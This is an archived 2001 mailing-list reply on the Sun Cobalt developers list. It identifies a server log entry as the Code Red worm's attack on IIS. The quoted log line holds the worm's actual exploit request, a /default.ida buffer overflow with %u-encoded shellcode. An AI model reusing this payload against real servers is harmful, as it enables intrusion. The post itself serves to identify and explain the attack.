[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-developers] Hacking attempts???

Subject: Re: [cobalt-developers] Hacking attempts???
From: Derek Belrose <derekb@xxxxxxxxxxxxxxxxxx>
Date: Fri Aug 17 09:07:06 2001
List-id: Discussion Forum for developers on Sun Cobalt Networks products <cobalt-developers.list.cobalt.com>

What you see there is the exact string that the Code Red worm uses to
hit an IIS server.  I've seen server logs full of requests like these.

> > Anyone got any idea what this is?
> > 
> > 
> > 207.108.246.5 - - [13/Aug/2001:00:57:29 +0100] "GET
> > 
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> > 
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> > 
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> > 
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
> bd3%
> > 
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> > HTTP/1.0" 302 627 "-" "-"
> > 
> > My logs show this multiple times today
> > 
> > Regards
> > Jamie Rossi
> > 
> > 
> > 
> > _______________________________________________
> > cobalt-developers mailing list
> > cobalt-developers@xxxxxxxxxxxxxxx
> > http://list.cobalt.com/mailman/listinfo/cobalt-developers
> 
> 
> _______________________________________________
> cobalt-developers mailing list
> cobalt-developers@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-developers

References:
- Re: [cobalt-developers] Hacking attempts???
  - From: Wolfgang Senf - Sun Germany - ham02 - Hamburg

Prev by Date: [cobalt-developers] Sun Cobalt Migration Utility Version 2
Next by Date: Re: [cobalt-developers] RAQ3 Front Page Probs
Previous by thread: Re: [cobalt-developers] Hacking attempts???
Next by thread: [cobalt-developers] majordomo exited unexpectedly with error 65535

Sun Cobalt Developers Message Index

Sun Cobalt Developers Thread Index